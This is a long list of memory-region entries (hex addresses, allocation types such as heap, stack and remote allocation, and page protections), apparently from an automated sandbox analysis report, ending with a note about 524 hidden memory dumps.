page read and write
1DEDDD21000
trusted library allocation
page read and write
4749000
trusted library allocation
page read and write
20D4D000
stack
page read and write
45E0000
heap
page read and write
206B0000
direct allocation
page read and write
2109EF2E000
heap
page read and write
1DEEBE09000
trusted library allocation
page read and write
29DF000
unkown
page read and write
2109EE80000
heap
page read and write
76F6BBE000
stack
page read and write
206A0000
direct allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
210A1226000
heap
page read and write
5619000
trusted library allocation
page read and write
20F9E000
stack
page read and write
8080000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
210A14B1000
heap
page read and write
7FFD9B784000
trusted library allocation
page read and write
27D0000
heap
page readonly
2109EEE9000
heap
page read and write
1DEF415E000
heap
page read and write
708E000
stack
page read and write
2109EF03000
heap
page read and write
1DED9EB5000
heap
page read and write
210A0974000
heap
page read and write
76F6B37000
stack
page read and write
1DEDA080000
trusted library allocation
page read and write
1DED9EEF000
heap
page read and write
8352000
heap
page read and write
2109EF1B000
heap
page read and write
210A09AB000
heap
page read and write
8040000
trusted library allocation
page read and write
832C000
heap
page read and write
76F6C3E000
stack
page read and write
1DEDC54F000
trusted library allocation
page read and write
20C3E000
stack
page read and write
8000000
trusted library allocation
page read and write
6E3C000
stack
page read and write
6C2B000
stack
page read and write
2109EF31000
heap
page read and write
2109EE89000
heap
page read and write
7FFD9B962000
trusted library allocation
page read and write
8314000
heap
page read and write
820C000
stack
page read and write
2109EE30000
heap
page read and write
7FFD9B79B000
trusted library allocation
page read and write
565F000
trusted library allocation
page read and write
2713000
trusted library allocation
page execute and read and write
1DEDA0B0000
heap
page read and write
1DEDD63B000
trusted library allocation
page read and write
7470000
trusted library allocation
page read and write
737E000
stack
page read and write
20DF0000
remote allocation
page read and write
20D8E000
stack
page read and write
74D0000
trusted library allocation
page read and write
29F1000
unkown
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1DEDB8E0000
trusted library allocation
page read and write
6D2A000
stack
page read and write
7430000
trusted library allocation
page read and write
21241000
trusted library allocation
page read and write
1DEDA0A0000
trusted library allocation
page read and write
2109EF30000
heap
page read and write
1DED9F10000
heap
page read and write
85FE000
stack
page read and write
210A098E000
heap
page read and write
210A097A000
heap
page read and write
76F6A37000
stack
page read and write
6D6E000
stack
page read and write
6FC35FE000
stack
page read and write
7F00000
trusted library allocation
page read and write
7FFD9B783000
trusted library allocation
page execute and read and write
565E000
stack
page read and write
6B5E000
stack
page read and write
7EE7000
stack
page read and write
2109EEEA000
heap
page read and write
1DEDC03F000
trusted library allocation
page read and write
1DEF413A000
heap
page read and write
82AC000
stack
page read and write
1DEDD46B000
trusted library allocation
page read and write
4598000
heap
page read and write
76F780D000
stack
page read and write
76F67FE000
stack
page read and write
2A20000
heap
page read and write
2109EEEF000
heap
page read and write
6DFE000
stack
page read and write
8560000
trusted library allocation
page read and write
2CED000
trusted library allocation
page execute and read and write
210A1080000
heap
page read and write
1DEDD44E000
trusted library allocation
page read and write
6FC39FF000
stack
page read and write
591E000
heap
page read and write
20FDE000
stack
page read and write
69FE000
stack
page read and write
7FBF000
stack
page read and write
74F0000
trusted library allocation
page execute and read and write
7FFD9BB20000
trusted library allocation
page execute and read and write
210A0F6D000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
8318000
heap
page read and write
2109EE40000
heap
page read and write
7380000
trusted library allocation
page read and write
1DEF3EB0000
heap
page read and write
2109EEEA000
heap
page read and write
20740000
direct allocation
page read and write
1DEEBE18000
trusted library allocation
page read and write
76F778E000
stack
page read and write
724C000
heap
page read and write
2770000
heap
page read and write
76F62E3000
stack
page read and write
802F000
trusted library allocation
page read and write
2D40000
heap
page readonly
210A097E000
heap
page read and write
7390000
trusted library allocation
page execute and read and write
7FFD9B965000
trusted library allocation
page read and write
76F6978000
stack
page read and write
20700000
direct allocation
page read and write
21230000
heap
page read and write
7500000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
2109EF21000
heap
page read and write
76F6D3E000
stack
page read and write
700E000
stack
page read and write
27BE000
stack
page read and write
6DAB000
stack
page read and write
6FC34FE000
stack
page read and write
7F70000
heap
page read and write
8320000
heap
page read and write
7460000
trusted library allocation
page read and write
2109EF11000
heap
page read and write
8660000
direct allocation
page read and write
1DED9E10000
heap
page read and write
2109EEE4000
heap
page read and write
20B7D000
stack
page read and write
7FFD9B931000
trusted library allocation
page read and write
850E000
stack
page read and write
1DED9F51000
heap
page read and write
2109EEBC000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
826E000
stack
page read and write
71F9000
heap
page read and write
1DEDBB21000
trusted library allocation
page read and write
7FFD9B967000
trusted library allocation
page read and write
2D10000
trusted library allocation
page read and write
4550000
heap
page execute and read and write
74C0000
trusted library allocation
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
1DEDB910000
heap
page read and write
210A097B000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
210A0E4A000
heap
page read and write
73EE000
stack
page read and write
58E4000
heap
page read and write
7510000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
20E90000
direct allocation
page read and write
8CB0000
direct allocation
page execute and read and write
1DEDCA62000
trusted library allocation
page read and write
20690000
direct allocation
page read and write
210A098D000
heap
page read and write
210A0972000
heap
page read and write
6FC2D7A000
stack
page read and write
76F69BE000
stack
page read and write
20CBE000
stack
page read and write
8620000
direct allocation
page read and write
1DEF4020000
heap
page read and write
591B000
heap
page read and write
2109EF21000
heap
page read and write
206D0000
direct allocation
page read and write
27D0000
heap
page read and write
561E000
unkown
page read and write
6BED000
stack
page read and write
210A0AF0000
heap
page read and write
6F70000
direct allocation
page read and write
1DED9E60000
heap
page read and write
4785000
remote allocation
page execute and read and write
2109EEAE000
heap
page read and write
76F788B000
stack
page read and write
1DED9EC7000
heap
page read and write
8185000
trusted library allocation
page read and write
2109EEF2000
heap
page read and write
6C80000
direct allocation
page read and write
7201000
heap
page read and write
2109EF42000
heap
page read and write
1DEDC05D000
trusted library allocation
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
74B0000
trusted library allocation
page read and write
2AD1000
heap
page read and write
1DEDC1C6000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page execute and read and write
20BFD000
stack
page read and write
1DEDBAF0000
heap
page execute and read and write
20DF0000
remote allocation
page read and write
27E0000
heap
page read and write
2CAE000
stack
page read and write
1DEDD5FF000
trusted library allocation
page read and write
210A097E000
heap
page read and write
2109EF42000
heap
page read and write
1DEDDC2D000
trusted library allocation
page read and write
76F66FF000
stack
page read and write
1DEDCA4A000
trusted library allocation
page read and write
7FFD9B790000
trusted library allocation
page read and write
584F000
stack
page read and write
55DE000
unkown
page read and write
210A0993000
heap
page read and write
210A09B2000
heap
page read and write
666E000
stack
page read and write
1DEF3F18000
heap
page read and write
1DEEBB21000
trusted library allocation
page read and write
1DEDB98A000
heap
page read and write
1DEF4100000
heap
page read and write
210A108D000
heap
page read and write
210A0978000
heap
page read and write
29E2000
unkown
page read and write
45E8000
heap
page read and write
6A15000
heap
page execute and read and write
742D000
stack
page read and write
2109EF7B000
heap
page read and write
2109EF06000
heap
page read and write
5675000
heap
page read and write
210A099B000
heap
page read and write
210A0975000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FF0000
trusted library allocation
page read and write
210A09A3000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
210A097E000
heap
page read and write
7F5D000
stack
page read and write
58DF000
heap
page read and write
6EB0000
heap
page read and write
1DEDA0B5000
heap
page read and write
58AE000
heap
page read and write
82D0000
heap
page read and write
7DF485AC0000
trusted library allocation
page execute and read and write
82F0000
heap
page read and write
1DEDC2A0000
trusted library allocation
page read and write
20C70000
trusted library allocation
page read and write
1DEDC56F000
trusted library allocation
page read and write
29EE000
unkown
page read and write
210A097E000
heap
page read and write
6A9E000
stack
page read and write
210A09A6000
heap
page read and write
20AA0000
heap
page read and write
210A0970000
heap
page read and write
1DEF4133000
heap
page read and write
210A0F69000
heap
page read and write
1DEDC03B000
trusted library allocation
page read and write
5921000
heap
page read and write
1DEDCA35000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
2109EF42000
heap
page read and write
1DEDB970000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
76F6DBC000
stack
page read and write
7FFD9B780000
trusted library allocation
page read and write
8030000
trusted library allocation
page read and write
6C70000
direct allocation
page read and write
82C0000
trusted library allocation
page execute and read and write
1DEF4198000
heap
page read and write
58E4000
heap
page read and write
2109EEEF000
heap
page read and write
21030000
heap
page read and write
20F5E000
stack
page read and write
1DEDBAE7000
heap
page execute and read and write
29E8000
unkown
page read and write
8670000
direct allocation
page read and write
71E9000
heap
page read and write
1DED9EAB000
heap
page read and write
210A09A6000
heap
page read and write
5660000
heap
page read and write
7FCD0000
trusted library allocation
page execute and read and write
854D000
stack
page read and write
2109EF7A000
heap
page read and write
2D60000
heap
page read and write
20AFE000
stack
page read and write
20DF0000
remote allocation
page read and write
7FFD9B7DC000
trusted library allocation
page execute and read and write
6A5F000
stack
page read and write
2109EF42000
heap
page read and write
1DEDCA70000
trusted library allocation
page read and write
5932000
heap
page read and write
27C9000
heap
page read and write
8690000
trusted library allocation
page execute and read and write
7FFD9B782000
trusted library allocation
page read and write
2109EF31000
heap
page read and write
5670000
heap
page read and write
8570000
heap
page read and write
72E0000
heap
page execute and read and write
1DEDC107000
trusted library allocation
page read and write
2D12000
trusted library allocation
page read and write
1DEDDC14000
trusted library allocation
page read and write
2109EF18000
heap
page read and write
1DED9EAD000
heap
page read and write
4568000
trusted library allocation
page read and write
7FFD9B830000
trusted library allocation
page read and write
662C000
stack
page read and write
2109EF4D000
heap
page read and write
210A0976000
heap
page read and write
723F000
heap
page read and write
20E6F000
stack
page read and write
2D0A000
trusted library allocation
page execute and read and write
210A0977000
heap
page read and write
210A0972000
heap
page read and write
97D5000
direct allocation
page execute and read and write
8309000
heap
page read and write
1DEDBB10000
heap
page execute and read and write
1DEDA040000
heap
page read and write
1DEDC0E1000
trusted library allocation
page read and write
76F667E000
stack
page read and write
1DEF3E60000
heap
page read and write
2109EF42000
heap
page read and write
6C60000
direct allocation
page read and write
1DEF3FF0000
heap
page read and write
1DEDB8A0000
trusted library allocation
page read and write
206F0000
direct allocation
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
210A0996000
heap
page read and write
27C0000
heap
page read and write
1DEEBE28000
trusted library allocation
page read and write
76F63EE000
stack
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
2109EEEB000
heap
page read and write
1DEDDC3A000
trusted library allocation
page read and write
2D6B000
heap
page read and write
5860000
heap
page read and write
1DED9EA6000
heap
page read and write
5947000
heap
page read and write
7FFD9B836000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
20CFF000
stack
page read and write
8650000
direct allocation
page read and write
210A099F000
heap
page read and write
76F687E000
stack
page read and write
2109EF37000
heap
page read and write
2CE4000
trusted library allocation
page read and write
29DC000
unkown
page read and write
1DED9EF4000
heap
page read and write
210A0980000
heap
page read and write
20720000
direct allocation
page read and write
27C5000
heap
page read and write
7EF0000
trusted library allocation
page read and write
1DEDC4BE000
trusted library allocation
page read and write
2109F170000
heap
page read and write
1DEDDC18000
trusted library allocation
page read and write
4590000
heap
page read and write
2AAD000
heap
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
733E000
stack
page read and write
1DED9E00000
heap
page read and write
2109EEA8000
heap
page read and write
2109EF29000
heap
page read and write
A1D5000
direct allocation
page execute and read and write
2109EEF5000
heap
page read and write
2D00000
trusted library allocation
page read and write
210A0983000
heap
page read and write
1DED9E77000
heap
page read and write
7FE0000
trusted library allocation
page read and write
1DEF41D0000
heap
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
1DEF4024000
heap
page read and write
1DEDD168000
trusted library allocation
page read and write
1DEF3F56000
heap
page read and write
2109EF30000
heap
page read and write
2CB0000
trusted library section
page read and write
6B1E000
stack
page read and write
7FFD9BA80000
trusted library allocation
page read and write
1DEDC02E000
trusted library allocation
page read and write
1DEF41C2000
heap
page read and write
2D50000
trusted library allocation
page execute and read and write
6FC30FE000
stack
page read and write
There are 524 hidden memdumps, click here to show them.